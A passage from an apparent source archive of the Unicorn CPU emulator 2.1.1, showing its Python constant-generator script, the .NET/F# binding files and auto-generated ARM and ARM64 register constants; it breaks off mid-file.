Deimos/unicorn: D binding (by Vladimir Panteleev) https://github.com/D-Programming-Deimos/unicorn - Unicorn-Lua: Lua binding (by Diego Argueta) https://github.com/dargueta/unicorn-lua - pharo-unicorn: Pharo binding (by Guille Polito) https://github.com/guillep/pharo-unicorn - Unicorn.js: JavaScript binding (by Alexandro Sanchez) https://github.com/AlexAltea/unicorn.js unicorn-2.1.1/bindings/const_generator.py000066400000000000000000000275251467524106700205620ustar00rootroot00000000000000#!/usr/bin/env python3 # Unicorn Engine # By Dang Hoang Vu, 2013 from __future__ import print_function import sys, re, os INCL_DIR = os.path.join('..', 'include', 'unicorn') include = [ 'arm.h', 'arm64.h', 'mips.h', 'x86.h', 'sparc.h', 'm68k.h', 'ppc.h', 'riscv.h', 's390x.h', 'tricore.h', 'unicorn.h' ] template = { 'python': { 'header': "# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [%s_const.py]\n", 'footer': "", 'line_format': 'UC_%s = %s\n', 'out_file': './python/unicorn/%s_const.py', # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'arm', 'arm64.h': 'arm64', 'mips.h': 'mips', 'x86.h': 'x86', 'sparc.h': 'sparc', 'm68k.h': 'm68k', 'ppc.h': 'ppc', 'riscv.h': 'riscv', 's390x.h' : 's390x', 'tricore.h' : 'tricore', 'unicorn.h': 'unicorn', 'comment_open': '#', 'comment_close': '', }, 'ruby': { 'header': "# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [%s_const.rb]\n\nmodule UnicornEngine\n", 'footer': "end", 'line_format': '\tUC_%s = %s\n', 'out_file': './ruby/unicorn_gem/lib/unicorn_engine/%s_const.rb', # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'arm', 'arm64.h': 'arm64', 'mips.h': 'mips', 'x86.h': 'x86', 'sparc.h': 'sparc', 'm68k.h': 'm68k', 'ppc.h': 'ppc', 'riscv.h': 'riscv', 's390x.h' : 's390x', 'tricore.h' : 'tricore', 'unicorn.h': 'unicorn', 'comment_open': '#', 'comment_close': '', }, 'go': { 'header': "package unicorn\n// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [%s_const.go]\nconst (\n", 'footer': ")", 'line_format': '\t%s = %s\n', 'out_file': './go/unicorn/%s_const.go', # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'arm', 'arm64.h': 'arm64', 'mips.h': 'mips', 'x86.h': 'x86', 'sparc.h': 'sparc', 'm68k.h': 'm68k', 'ppc.h': 'ppc', 'riscv.h': 'riscv', 's390x.h' : 's390x', 'tricore.h' : 'tricore', 'unicorn.h': 'unicorn', 'comment_open': '//', 'comment_close': '', }, 'java': { 'header': "// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT\n\npackage unicorn;\n\npublic interface %sConst {\n", 'footer': "\n}\n", 'line_format': ' public static final int UC_%s = %s;\n', 'out_file': './java/src/main/java/unicorn/%sConst.java', # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'Arm', 'arm64.h': 'Arm64', 'mips.h': 'Mips', 'x86.h': 'X86', 'sparc.h': 'Sparc', 'm68k.h': 'M68k', 'ppc.h': 'Ppc', 'riscv.h': 'Riscv', 's390x.h' : 'S390x', 'tricore.h' : 'TriCore', 'unicorn.h': 'Unicorn', 'comment_open': ' //', 'comment_close': '', }, 'dotnet': { 'header': "// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT\n\nnamespace UnicornEngine.Const\n\nopen System\n\n[]\nmodule %s =\n", 'footer': "\n", 'line_format': ' let UC_%s = %s\n', 'out_file': os.path.join('dotnet', 'UnicornEngine', 'Const', '%s.fs'), # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'Arm', 'arm64.h': 'Arm64', 'mips.h': 'Mips', 'x86.h': 'X86', 'sparc.h': 'Sparc', 'm68k.h': 'M68k', 'ppc.h': 'Ppc', 'riscv.h': 'Riscv', 's390x.h' : 'S390x', 'tricore.h' : 'TriCore', 'unicorn.h': 'Common', 'comment_open': ' //', 'comment_close': '', }, 'pascal': { 'header': "// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT\n\nunit %sConst;\n\ninterface\n\nconst", 'footer': "\nimplementation\nend.", 'line_format': ' UC_%s = %s;\n', 'out_file': os.path.join('pascal', 'unicorn', '%sConst.pas'), # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'Arm', 'arm64.h': 'Arm64', 'mips.h': 'Mips', 'x86.h': 'X86', 'sparc.h': 'Sparc', 'm68k.h': 'M68k', 'ppc.h': 'Ppc', 'riscv.h': 'Riscv', 's390x.h' : 'S390x', 'tricore.h' : 'TriCore', 'unicorn.h': 'Unicorn', 'comment_open': '//', 'comment_close': '', }, 'zig': { 'header': "// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT\n\npub const %sConst = enum(c_int) {\n", 'footer': "\n};\n", 'line_format': '\t%s = %s,\n', 'out_file': './zig/unicorn/%s_const.zig', # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'arm', 'arm64.h': 'arm64', 'mips.h': 'mips', 'x86.h': 'x86', 'sparc.h': 'sparc', 'm68k.h': 'm68k', 'ppc.h': 'ppc', 'riscv.h': 'riscv', 's390x.h' : 's390x', 'tricore.h' : 'tricore', 'unicorn.h': 'unicorn', 'comment_open': '//', 'comment_close': '', }, } # markup for comments to be added to autogen files MARKUP = '//>' def gen(lang): global include, INCL_DIR templ = template[lang] for target in include: prefix = templ[target] outfn = templ['out_file'] % prefix outfile = open(outfn + ".tmp", 'wb') # open as binary prevents windows newlines outfile.write((templ['header'] % prefix).encode("utf-8")) if target == 'unicorn.h': prefix = '' with open(os.path.join(INCL_DIR, target)) as f: lines = f.readlines() previous = {} count = 0 skip = 0 in_comment = False for lno, line in enumerate(lines): if "/*" in line: in_comment = True if "*/" in line: in_comment = False if in_comment: continue if skip > 0: # Due to clang-format, values may come up in the next line skip -= 1 continue line = line.strip() if line.startswith(MARKUP): # markup for comments outfile.write(("\n%s%s%s\n" %(templ['comment_open'], \ line.replace(MARKUP, ''), templ['comment_close'])).encode("utf-8")) continue if line == '' or line.startswith('//'): continue tmp = line.strip().split(',') if len(tmp) >= 2 and tmp[0] != "#define" and not tmp[0].startswith("UC_"): continue for t in tmp: t = t.strip() if not t or t.startswith('//'): continue f = re.split('\s+', t) # parse #define UC_TARGET (num) define = False if f[0] == '#define' and len(f) >= 3: define = True f.pop(0) f.insert(1, '=') if f[0].startswith("UC_" + prefix.upper()) or f[0].startswith("UC_CPU"): if len(f) > 1 and f[1] not in ('//', '='): print("WARNING: Unable to convert %s" % f) print(" Line =", line) continue elif len(f) > 1 and f[1] == '=': # Like: # UC_A = # (1 << 2) # #define UC_B \ # (UC_A | UC_C) # Let's search the next line if len(f) == 2: if lno == len(lines) - 1: print("WARNING: Unable to convert %s" % f) print(" Line =", line) continue skip += 1 next_line = lines[lno + 1] next_line_tmp = next_line.strip().split(",") rhs = next_line_tmp[0] elif f[-1] == "\\": idx = 0 rhs = "" while True: idx += 1 if lno + idx == len(lines): print("WARNING: Unable to convert %s" % f) print(" Line =", line) continue skip += 1 next_line = lines[lno + idx] next_line_f = re.split('\s+', next_line.strip()) if next_line_f[-1] == "\\": rhs += "".join(next_line_f[:-1]) else: rhs += next_line.strip() break else: rhs = ''.join(f[2:]) else: rhs = str(count) lhs = f[0].strip() #print(f'lhs: {lhs} rhs: {rhs} f:{f}') # evaluate bitshifts in constants e.g. "UC_X86 = 1 << 1" match = re.match(r'(?P\s*\d+\s*<<\s*\d+\s*)', rhs) if match: rhs = str(eval(match.group(1))) else: # evaluate references to other constants e.g. "UC_ARM_REG_X = UC_ARM_REG_SP" match = re.match(r'^([^\d]\w+)$', rhs) if match: rhs = previous[match.group(1)] if not rhs.isdigit(): for k, v in previous.items(): rhs = re.sub(r'\b%s\b' % k, v, rhs) rhs = str(eval(rhs)) lhs_strip = re.sub(r'^UC_', '', lhs) count = int(rhs) + 1 if (count == 1): outfile.write(("\n").encode("utf-8")) outfile.write((templ['line_format'] % (lhs_strip, rhs)).encode("utf-8")) previous[lhs] = str(rhs) outfile.write((templ['footer']).encode("utf-8")) outfile.close() if os.path.isfile(outfn): with open(outfn, "rb") as infile: cur_data = infile.read() with open(outfn + ".tmp", "rb") as infile: new_data = infile.read() if cur_data == new_data: os.unlink(outfn + ".tmp") else: os.unlink(outfn) os.rename(outfn + ".tmp", outfn) else: os.rename(outfn + ".tmp", outfn) def main(): lang = sys.argv[1] if lang == "all": for lang in template.keys(): print("Generating constants for {}".format(lang)) gen(lang) else: if not lang in template: raise RuntimeError("Unsupported binding %s" % lang) gen(lang) if __name__ == "__main__": if len(sys.argv) < 2: print("Usage:", sys.argv[0], " ") print("Supported: {}".format(["all"] + [x for x in template.keys()])) sys.exit(1) main() unicorn-2.1.1/bindings/dotnet/000077500000000000000000000000001467524106700162765ustar00rootroot00000000000000unicorn-2.1.1/bindings/dotnet/README.md000066400000000000000000000020311467524106700175510ustar00rootroot00000000000000This documentation explains how to use the .NET binding for Unicorn from source. 0. Install the core engine as a dependency Follow README in the root directory to compile & install the core. 1. Compile the code You need to have at least version 5.0 of .NET installed. 1. Windows To compile the code open the UnicornSln.sln with Microsoft Visual Studio 12 or with a newer version and just press Ctrl+Shift+B to build the solution. 2. Linux To compile the code open a terminal in this directory and enter the following command to build the solution: `dotnet build` 2. Usage The solution includes the testing project UnicornTests with examples of usage. In order to use the library in your project just add a reference to the .NET library and be sure to copy the unmanaged unicorn.dll library in the output directory. The naming convention used is the Upper Camel Case, this mean that to invoke the uc_mem_read method you have to search for the MemRead method. unicorn-2.1.1/bindings/dotnet/UnicornDotNet.sln000066400000000000000000000027021467524106700215500ustar00rootroot00000000000000 Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio 14 VisualStudioVersion = 14.0.23107.0 MinimumVisualStudioVersion = 10.0.40219.1 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UnicornSamples", "UnicornSamples\UnicornSamples.csproj", "{B80B5987-1E24-4309-8BF9-C4F91270F21C}" EndProject Project("{F2A71F9B-5D33-465A-A702-920D77279786}") = "UnicornEngine", "UnicornEngine\UnicornEngine.fsproj", "{0C21F1C1-2725-4A46-9022-1905F85822A5}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Any CPU = Debug|Any CPU Release|Any CPU = Release|Any CPU EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {B80B5987-1E24-4309-8BF9-C4F91270F21C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU {B80B5987-1E24-4309-8BF9-C4F91270F21C}.Debug|Any CPU.Build.0 = Debug|Any CPU {B80B5987-1E24-4309-8BF9-C4F91270F21C}.Release|Any CPU.ActiveCfg = Release|Any CPU {B80B5987-1E24-4309-8BF9-C4F91270F21C}.Release|Any CPU.Build.0 = Release|Any CPU {0C21F1C1-2725-4A46-9022-1905F85822A5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU {0C21F1C1-2725-4A46-9022-1905F85822A5}.Debug|Any CPU.Build.0 = Debug|Any CPU {0C21F1C1-2725-4A46-9022-1905F85822A5}.Release|Any CPU.ActiveCfg = Release|Any CPU {0C21F1C1-2725-4A46-9022-1905F85822A5}.Release|Any CPU.Build.0 = Release|Any CPU EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE EndGlobalSection EndGlobal unicorn-2.1.1/bindings/dotnet/UnicornEngine/000077500000000000000000000000001467524106700210415ustar00rootroot00000000000000unicorn-2.1.1/bindings/dotnet/UnicornEngine/Binding/000077500000000000000000000000001467524106700224135ustar00rootroot00000000000000unicorn-2.1.1/bindings/dotnet/UnicornEngine/Binding/BindingFactory.fs000066400000000000000000000003471467524106700256530ustar00rootroot00000000000000namespace UnicornEngine.Binding module BindingFactory = let mutable _instance = NativeBinding.instance let setDefaultBinding(binding: IBinding) = _instance <- binding let getDefault() = _instance unicorn-2.1.1/bindings/dotnet/UnicornEngine/Binding/IBinding.fs000066400000000000000000000027251467524106700244360ustar00rootroot00000000000000namespace UnicornEngine.Binding open System type IBinding = interface abstract Version : UIntPtr * UIntPtr -> Int32 abstract ArchSupported : Int32 -> Boolean abstract UcOpen : UInt32 * UInt32 * UIntPtr array -> Int32 abstract Close : UIntPtr -> Int32 abstract Strerror : Int32 -> IntPtr abstract Errono : UIntPtr -> Int32 abstract RegRead : UIntPtr * Int32 * Byte array -> Int32 abstract RegWrite : UIntPtr * Int32 * Byte array -> Int32 abstract MemRead : UIntPtr * UInt64 * Byte array * UIntPtr -> Int32 abstract MemWrite : UIntPtr * UInt64 * Byte array * UIntPtr -> Int32 abstract EmuStart : UIntPtr * UInt64 * UInt64 * UInt64 * UInt64 -> Int32 abstract EmuStop : UIntPtr -> Int32 abstract HookDel : UIntPtr * UIntPtr -> Int32 abstract MemMap : UIntPtr * UInt64 * UIntPtr * UInt32 -> Int32 abstract MemMapPtr : UIntPtr * UInt64 * UIntPtr * UInt32 * UIntPtr -> Int32 abstract MemUnmap : UIntPtr * UInt64 * UIntPtr -> Int32 abstract MemProtect : UIntPtr * UInt64 * UIntPtr * UInt32 -> Int32 abstract HookAddNoarg : UIntPtr * UIntPtr * Int32 * UIntPtr * IntPtr * UInt64 * UInt64 -> Int32 abstract HookAddArg0 : UIntPtr * UIntPtr * Int32 * UIntPtr * IntPtr * UInt64 * UInt64 * Int32 -> Int32 abstract HookAddArg0Arg1 : UIntPtr * UIntPtr * Int32 * UIntPtr * IntPtr * UInt64 * UInt64 * UInt64 * UInt64 -> Int32 end unicorn-2.1.1/bindings/dotnet/UnicornEngine/Binding/MockBinding.fs000066400000000000000000000065301467524106700251350ustar00rootroot00000000000000namespace UnicornEngine.Binding open System module internal MockBinding = // by using a mutables variables it is easier to create testing code let mutable version = fun(major, minor) -> 0 let mutable uc_open = fun(arch, mode, uc) -> 0 let mutable close = fun(eng) -> 0 let mutable mem_map = fun(eng, adress, size, perm) -> 0 let mutable mem_map_ptr = fun(eng, address, size, perms, ptr) -> 0 let mutable mem_unmap = fun(eng, address, size) -> 0 let mutable mem_protect = fun(eng, address, size, perms) -> 0 let mutable mem_write = fun(eng, adress, value, size) -> 0 let mutable mem_read = fun(eng, adress, value, size) -> 0 let mutable reg_write = fun(eng, regId, value) -> 0 let mutable reg_read = fun(eng, regId, value) -> 0 let mutable emu_start = fun(eng, beginAddr, untilAddr, timeout, count) -> 0 let mutable emu_stop = fun(eng) -> 0 let mutable hook_del = fun(eng, hook) -> 0 let mutable arch_supported = fun(arch) -> true let mutable errno = fun(eng) -> 0 let mutable strerror = fun(err) -> new nativeint(0) let mutable hook_add_noarg = fun(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) -> 0 let mutable hook_add_arg0 = fun(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) -> 0 let mutable hook_add_arg0_arg1 = fun(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) -> 0 let instance = {new IBinding with member thi.Version(major, minor) = version(major, minor) member thi.UcOpen(arch, mode, uc) = uc_open(arch, mode, uc) member thi.Close(eng) = close(eng) member thi.MemMap(eng, adress, size, perm) = mem_map(eng, adress, size, perm) member thi.MemWrite(eng, adress, value, size) = mem_write(eng, adress, value, size) member thi.MemRead(eng, adress, value, size) = mem_read(eng, adress, value, size) member thi.RegWrite(eng, regId, value) = reg_write(eng, regId, value) member thi.RegRead(eng, regId, value) = reg_read(eng, regId, value) member thi.EmuStart(eng, beginAddr, untilAddr, timeout, count) = emu_start(eng, beginAddr, untilAddr, timeout, count) member thi.EmuStop(eng) = emu_stop(eng) member this.HookDel(eng, hook) = hook_del(eng, hook) member thi.ArchSupported(arch) = arch_supported(arch) member thi.Errono(eng) = errno(eng) member thi.Strerror(err) = strerror(err) member this.MemMapPtr(eng, address, size, perms, ptr) = mem_map_ptr(eng, address, size, perms, ptr) member this.MemUnmap(eng, address, size) = mem_unmap(eng, address, size) member this.MemProtect(eng, address, size, perms) = mem_protect(eng, address, size, perms) member thi.HookAddNoarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) = hook_add_noarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) member thi.HookAddArg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) = hook_add_arg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) member thi.HookAddArg0Arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) = hook_add_arg0_arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) } unicorn-2.1.1/bindings/dotnet/UnicornEngine/Binding/NativeBinding.fs000066400000000000000000000130021467524106700254620ustar00rootroot00000000000000namespace UnicornEngine.Binding open System open System.Runtime.InteropServices module NativeBinding = [] module private Imported = [] extern Int32 uc_version(UIntPtr major, UIntPtr minor) [] extern Int32 uc_open(UInt32 arch, UInt32 mode, UIntPtr[] engine) [] extern Int32 uc_close(UIntPtr eng) [] extern Int32 uc_mem_map(UIntPtr eng, UInt64 address, UIntPtr size, UInt32 perm) [] extern Int32 uc_mem_map_ptr(UIntPtr eng, UInt64 address, UIntPtr size, UInt32 perm, UIntPtr ptr) [] extern Int32 uc_mem_unmap(UIntPtr eng, UInt64 address, UIntPtr size) [] extern Int32 uc_mem_protect(UIntPtr eng, UInt64 address, UIntPtr size, UInt32 perms) [] extern Int32 uc_mem_write(UIntPtr eng, UInt64 address, Byte[] value, UIntPtr size) [] extern Int32 uc_mem_read(UIntPtr eng, UInt64 address, Byte[] value, UIntPtr size) [] extern Int32 uc_reg_write(UIntPtr eng, Int32 regId, Byte[] value) [] extern Int32 uc_reg_read(UIntPtr eng, Int32 regId, Byte[] value) [] extern Int32 uc_emu_start(UIntPtr eng, UInt64 beginAddr, UInt64 untilAddr, UInt64 timeout, UInt64 count) [] extern Int32 uc_emu_stop(UIntPtr eng) [] extern Int32 uc_hook_del(UIntPtr eng, UIntPtr hook) [] extern Boolean uc_arch_supported(Int32 arch) [] extern Int32 uc_errno(UIntPtr eng) [] extern IntPtr uc_strerror(Int32 err) [] extern Int32 uc_hook_add_noarg(UIntPtr eng, UIntPtr hh, Int32 callbackType, UIntPtr callback, IntPtr userData, UInt64 hookbegin, UInt64 hookend) [] extern Int32 uc_hook_add_arg0(UIntPtr eng, UIntPtr hh, Int32 callbackType, UIntPtr callback, IntPtr userData, UInt64 hookbegin, UInt64 hookend, Int32 arg0) [] extern Int32 uc_hook_add_arg0_arg1(UIntPtr eng, UIntPtr hh, Int32 callbackType, UIntPtr callback, IntPtr userData, UInt64 hookbegin, UInt64 hookend, UInt64 arg0, UInt64 arg1) let instance = {new IBinding with member thi.Version(major, minor) = uc_version(major, minor) member thi.UcOpen(arch, mode, uc) = uc_open(arch, mode, uc) member thi.Close(eng) = uc_close(eng) member thi.MemMap(eng, adress, size, perm) = uc_mem_map(eng, adress, size, perm) member thi.MemWrite(eng, adress, value, size) = uc_mem_write(eng, adress, value, size) member thi.MemRead(eng, adress, value, size) = uc_mem_read(eng, adress, value, size) member thi.RegWrite(eng, regId, value) = uc_reg_write(eng, regId, value) member thi.RegRead(eng, regId, value) = uc_reg_read(eng, regId, value) member thi.EmuStart(eng, beginAddr, untilAddr, timeout, count) = uc_emu_start(eng, beginAddr, untilAddr, timeout, count) member thi.EmuStop(eng) = uc_emu_stop(eng) member this.HookDel(eng, hook) = uc_hook_del(eng, hook) member thi.ArchSupported(arch) = uc_arch_supported(arch) member thi.Errono(eng) = uc_errno(eng) member thi.Strerror(err) = uc_strerror(err) member this.MemMapPtr(eng, address, size, perms, ptr) = uc_mem_map_ptr(eng, address, size, perms, ptr) member this.MemUnmap(eng, address, size) = uc_mem_unmap(eng, address, size) member this.MemProtect(eng, address, size, perms) = uc_mem_protect(eng, address, size, perms) member thi.HookAddNoarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) = uc_hook_add_noarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) member thi.HookAddArg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) = uc_hook_add_arg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) member thi.HookAddArg0Arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) = uc_hook_add_arg0_arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) }unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/000077500000000000000000000000001467524106700221275ustar00rootroot00000000000000unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Arm.fs000066400000000000000000000127471467524106700232130ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Arm = // ARM CPU let UC_CPU_ARM_926 = 0 let UC_CPU_ARM_946 = 1 let UC_CPU_ARM_1026 = 2 let UC_CPU_ARM_1136_R2 = 3 let UC_CPU_ARM_1136 = 4 let UC_CPU_ARM_1176 = 5 let UC_CPU_ARM_11MPCORE = 6 let UC_CPU_ARM_CORTEX_M0 = 7 let UC_CPU_ARM_CORTEX_M3 = 8 let UC_CPU_ARM_CORTEX_M4 = 9 let UC_CPU_ARM_CORTEX_M7 = 10 let UC_CPU_ARM_CORTEX_M33 = 11 let UC_CPU_ARM_CORTEX_R5 = 12 let UC_CPU_ARM_CORTEX_R5F = 13 let UC_CPU_ARM_CORTEX_A7 = 14 let UC_CPU_ARM_CORTEX_A8 = 15 let UC_CPU_ARM_CORTEX_A9 = 16 let UC_CPU_ARM_CORTEX_A15 = 17 let UC_CPU_ARM_TI925T = 18 let UC_CPU_ARM_SA1100 = 19 let UC_CPU_ARM_SA1110 = 20 let UC_CPU_ARM_PXA250 = 21 let UC_CPU_ARM_PXA255 = 22 let UC_CPU_ARM_PXA260 = 23 let UC_CPU_ARM_PXA261 = 24 let UC_CPU_ARM_PXA262 = 25 let UC_CPU_ARM_PXA270 = 26 let UC_CPU_ARM_PXA270A0 = 27 let UC_CPU_ARM_PXA270A1 = 28 let UC_CPU_ARM_PXA270B0 = 29 let UC_CPU_ARM_PXA270B1 = 30 let UC_CPU_ARM_PXA270C0 = 31 let UC_CPU_ARM_PXA270C5 = 32 let UC_CPU_ARM_MAX = 33 let UC_CPU_ARM_ENDING = 34 // ARM registers let UC_ARM_REG_INVALID = 0 let UC_ARM_REG_APSR = 1 let UC_ARM_REG_APSR_NZCV = 2 let UC_ARM_REG_CPSR = 3 let UC_ARM_REG_FPEXC = 4 let UC_ARM_REG_FPINST = 5 let UC_ARM_REG_FPSCR = 6 let UC_ARM_REG_FPSCR_NZCV = 7 let UC_ARM_REG_FPSID = 8 let UC_ARM_REG_ITSTATE = 9 let UC_ARM_REG_LR = 10 let UC_ARM_REG_PC = 11 let UC_ARM_REG_SP = 12 let UC_ARM_REG_SPSR = 13 let UC_ARM_REG_D0 = 14 let UC_ARM_REG_D1 = 15 let UC_ARM_REG_D2 = 16 let UC_ARM_REG_D3 = 17 let UC_ARM_REG_D4 = 18 let UC_ARM_REG_D5 = 19 let UC_ARM_REG_D6 = 20 let UC_ARM_REG_D7 = 21 let UC_ARM_REG_D8 = 22 let UC_ARM_REG_D9 = 23 let UC_ARM_REG_D10 = 24 let UC_ARM_REG_D11 = 25 let UC_ARM_REG_D12 = 26 let UC_ARM_REG_D13 = 27 let UC_ARM_REG_D14 = 28 let UC_ARM_REG_D15 = 29 let UC_ARM_REG_D16 = 30 let UC_ARM_REG_D17 = 31 let UC_ARM_REG_D18 = 32 let UC_ARM_REG_D19 = 33 let UC_ARM_REG_D20 = 34 let UC_ARM_REG_D21 = 35 let UC_ARM_REG_D22 = 36 let UC_ARM_REG_D23 = 37 let UC_ARM_REG_D24 = 38 let UC_ARM_REG_D25 = 39 let UC_ARM_REG_D26 = 40 let UC_ARM_REG_D27 = 41 let UC_ARM_REG_D28 = 42 let UC_ARM_REG_D29 = 43 let UC_ARM_REG_D30 = 44 let UC_ARM_REG_D31 = 45 let UC_ARM_REG_FPINST2 = 46 let UC_ARM_REG_MVFR0 = 47 let UC_ARM_REG_MVFR1 = 48 let UC_ARM_REG_MVFR2 = 49 let UC_ARM_REG_Q0 = 50 let UC_ARM_REG_Q1 = 51 let UC_ARM_REG_Q2 = 52 let UC_ARM_REG_Q3 = 53 let UC_ARM_REG_Q4 = 54 let UC_ARM_REG_Q5 = 55 let UC_ARM_REG_Q6 = 56 let UC_ARM_REG_Q7 = 57 let UC_ARM_REG_Q8 = 58 let UC_ARM_REG_Q9 = 59 let UC_ARM_REG_Q10 = 60 let UC_ARM_REG_Q11 = 61 let UC_ARM_REG_Q12 = 62 let UC_ARM_REG_Q13 = 63 let UC_ARM_REG_Q14 = 64 let UC_ARM_REG_Q15 = 65 let UC_ARM_REG_R0 = 66 let UC_ARM_REG_R1 = 67 let UC_ARM_REG_R2 = 68 let UC_ARM_REG_R3 = 69 let UC_ARM_REG_R4 = 70 let UC_ARM_REG_R5 = 71 let UC_ARM_REG_R6 = 72 let UC_ARM_REG_R7 = 73 let UC_ARM_REG_R8 = 74 let UC_ARM_REG_R9 = 75 let UC_ARM_REG_R10 = 76 let UC_ARM_REG_R11 = 77 let UC_ARM_REG_R12 = 78 let UC_ARM_REG_S0 = 79 let UC_ARM_REG_S1 = 80 let UC_ARM_REG_S2 = 81 let UC_ARM_REG_S3 = 82 let UC_ARM_REG_S4 = 83 let UC_ARM_REG_S5 = 84 let UC_ARM_REG_S6 = 85 let UC_ARM_REG_S7 = 86 let UC_ARM_REG_S8 = 87 let UC_ARM_REG_S9 = 88 let UC_ARM_REG_S10 = 89 let UC_ARM_REG_S11 = 90 let UC_ARM_REG_S12 = 91 let UC_ARM_REG_S13 = 92 let UC_ARM_REG_S14 = 93 let UC_ARM_REG_S15 = 94 let UC_ARM_REG_S16 = 95 let UC_ARM_REG_S17 = 96 let UC_ARM_REG_S18 = 97 let UC_ARM_REG_S19 = 98 let UC_ARM_REG_S20 = 99 let UC_ARM_REG_S21 = 100 let UC_ARM_REG_S22 = 101 let UC_ARM_REG_S23 = 102 let UC_ARM_REG_S24 = 103 let UC_ARM_REG_S25 = 104 let UC_ARM_REG_S26 = 105 let UC_ARM_REG_S27 = 106 let UC_ARM_REG_S28 = 107 let UC_ARM_REG_S29 = 108 let UC_ARM_REG_S30 = 109 let UC_ARM_REG_S31 = 110 let UC_ARM_REG_C1_C0_2 = 111 let UC_ARM_REG_C13_C0_2 = 112 let UC_ARM_REG_C13_C0_3 = 113 let UC_ARM_REG_IPSR = 114 let UC_ARM_REG_MSP = 115 let UC_ARM_REG_PSP = 116 let UC_ARM_REG_CONTROL = 117 let UC_ARM_REG_IAPSR = 118 let UC_ARM_REG_EAPSR = 119 let UC_ARM_REG_XPSR = 120 let UC_ARM_REG_EPSR = 121 let UC_ARM_REG_IEPSR = 122 let UC_ARM_REG_PRIMASK = 123 let UC_ARM_REG_BASEPRI = 124 let UC_ARM_REG_BASEPRI_MAX = 125 let UC_ARM_REG_FAULTMASK = 126 let UC_ARM_REG_APSR_NZCVQ = 127 let UC_ARM_REG_APSR_G = 128 let UC_ARM_REG_APSR_NZCVQG = 129 let UC_ARM_REG_IAPSR_NZCVQ = 130 let UC_ARM_REG_IAPSR_G = 131 let UC_ARM_REG_IAPSR_NZCVQG = 132 let UC_ARM_REG_EAPSR_NZCVQ = 133 let UC_ARM_REG_EAPSR_G = 134 let UC_ARM_REG_EAPSR_NZCVQG = 135 let UC_ARM_REG_XPSR_NZCVQ = 136 let UC_ARM_REG_XPSR_G = 137 let UC_ARM_REG_XPSR_NZCVQG = 138 let UC_ARM_REG_CP_REG = 139 let UC_ARM_REG_ENDING = 140 // alias registers let UC_ARM_REG_R13 = 12 let UC_ARM_REG_R14 = 10 let UC_ARM_REG_R15 = 11 let UC_ARM_REG_SB = 75 let UC_ARM_REG_SL = 76 let UC_ARM_REG_FP = 77 let UC_ARM_REG_IP = 78 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Arm64.fs000066400000000000000000000236101467524106700233540ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Arm64 = // ARM64 CPU let UC_CPU_ARM64_A57 = 0 let UC_CPU_ARM64_A53 = 1 let UC_CPU_ARM64_A72 = 2 let UC_CPU_ARM64_MAX = 3 let UC_CPU_ARM64_ENDING = 4 // ARM64 registers let UC_ARM64_REG_INVALID = 0 let UC_ARM64_REG_X29 = 1 let UC_ARM64_REG_X30 = 2 let UC_ARM64_REG_NZCV = 3 let UC_ARM64_REG_SP = 4 let UC_ARM64_REG_WSP = 5 let UC_ARM64_REG_WZR = 6 let UC_ARM64_REG_XZR = 7 let UC_ARM64_REG_B0 = 8 let UC_ARM64_REG_B1 = 9 let UC_ARM64_REG_B2 = 10 let UC_ARM64_REG_B3 = 11 let UC_ARM64_REG_B4 = 12 let UC_ARM64_REG_B5 = 13 let UC_ARM64_REG_B6 = 14 let UC_ARM64_REG_B7 = 15 let UC_ARM64_REG_B8 = 16 let UC_ARM64_REG_B9 = 17 let UC_ARM64_REG_B10 = 18 let UC_ARM64_REG_B11 = 19 let UC_ARM64_REG_B12 = 20 let UC_ARM64_REG_B13 = 21 let UC_ARM64_REG_B14 = 22 let UC_ARM64_REG_B15 = 23 let UC_ARM64_REG_B16 = 24 let UC_ARM64_REG_B17 = 25 let UC_ARM64_REG_B18 = 26 let UC_ARM64_REG_B19 = 27 let UC_ARM64_REG_B20 = 28 let UC_ARM64_REG_B21 = 29 let UC_ARM64_REG_B22 = 30 let UC_ARM64_REG_B23 = 31 let UC_ARM64_REG_B24 = 32 let UC_ARM64_REG_B25 = 33 let 